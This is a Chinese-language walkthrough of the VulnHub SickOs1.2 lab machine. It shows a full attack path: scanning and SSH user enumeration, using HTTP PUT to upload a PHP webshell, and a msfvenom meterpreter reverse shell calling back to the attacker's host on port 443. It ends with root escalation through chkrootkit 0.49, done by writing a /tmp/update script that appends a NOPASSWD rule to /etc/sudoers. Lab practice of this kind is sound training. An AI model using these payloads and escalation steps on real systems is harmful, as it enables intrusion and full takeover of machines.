kali渗透综合靶机(十二)--SickOs1.2靶机

一、靶机下载

下载链接：https://download.vulnhub.com/sickos/sick0s1.2.zip

二、SickOs1.2靶机搭建

将下载好的靶机环境，用VMware导入即可使用，文件->打开


导入到合适位置即可，默认是C盘，成功导入虚拟机之后，打开即可

三、攻击过程

kali IP：192.168.212.6
靶机IP：192.168.212.9

1、主机发现

nmap -sn 192.168.212.0/24

2、端口扫描

方法一：

方法二：

3、端口服务识别

4、漏洞查找与利用

浏览器访问，没有发现任何有用信息

目录扫描

发现http://192.168.212.9/test/

发现ssh的版本OpenSSH 5.9p1,存在用户枚举漏洞，用msf枚举用户得到用户John, root




使用hydra进行ssh爆破,没有破解出来

发现web服务的版本lighttpd 1.4.28
searchsploit lighttpd，搜索漏洞,发现没有什么可利用的漏洞

nmap 192.168.10.170 --script=http-methods.nse --script-args=http.methods.url-path="/test" 扫描/test页面的支持的http方法

或者对/test页面抓包,然后修改请求头为OPTIONS查看支持的HTTP方法

测试PUT方法（注意数据包中的每一个空格都不要修改，否则有可能上传失败）
上传了一个html文件进行测试，发现真的上传成功了（上传一个不存在的文件会响应201 Created）

Getshell方式一:

上传php一句话



.在菜刀中上传php反弹shell,反弹连接的IP以及端口,端口设置为443(防火墙阻止了非常用端口出去)
将反弹shell文件复制到桌面，修改IP地址及端口号




kali打开监听端口，浏览器访问shell文件


查看系统版本和内核版本

Getshell方式二

Msfvenom生成一个反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=443 > shell443.php

curl上传生成的反弹shell到目标

在Kali测试机上打开msfconsole，exploit/multi/handler模块，指定IP和端口进行监听，然后放到后台。


浏览器访问shell文件

成功返回shell

提权方式一:利用exp

查看靶机服务器和版本信息


或者查看系统是否存在chkrootkit,发现chkrootkit的版本为0.49

chkrootkit 0.49漏洞原理:chkrootkit有crontab，会定期以root身份执行/tmp/update文件。如果攻击者知道管理员是定期运行chkrootkit(通过查看cron.daily获知)，并且对/ tmp(没有挂载noexec)有写访问权限，就可以利用该漏洞获取root权限。

漏洞利用: 于是我们可以利用这一点，在/tmp目录下新建update文件，做我们想让root帮我们做的事

touch /tmp/update
chmod +x /tmp/update
添加当前用户www-data到sudoers列表中；
echo ‘chmod +w /etc/sudoers && echo “www-data ALL=(ALL)NOPASSWD:ALL” >> /etc/sudoers’ > /tmp/update
sudo su root

过一会儿后切换root账户，成功

提权方式二

exploit-database中对漏洞chkrootkit进行搜索

msf中利用对应的漏洞结合已经获得的session

总结

1、信息收集、端口扫描、服务识别、目录扫描
2、nmap 的http-methods.nse脚本获得目标支持的http方法,发现/test页面支持put方法
3、使用burp修改包，用put方法上传一句话或者curl 上传获得shell
4、利用chkrootkit版本0.49定期以root身份执行/tmp/update文件来提权。
　　1.利用msf中chkrootkit攻击模块
　　2.手动创建在/tmp创建update文件,然后利用自动执行update文件,在update写入添加账户到sudo组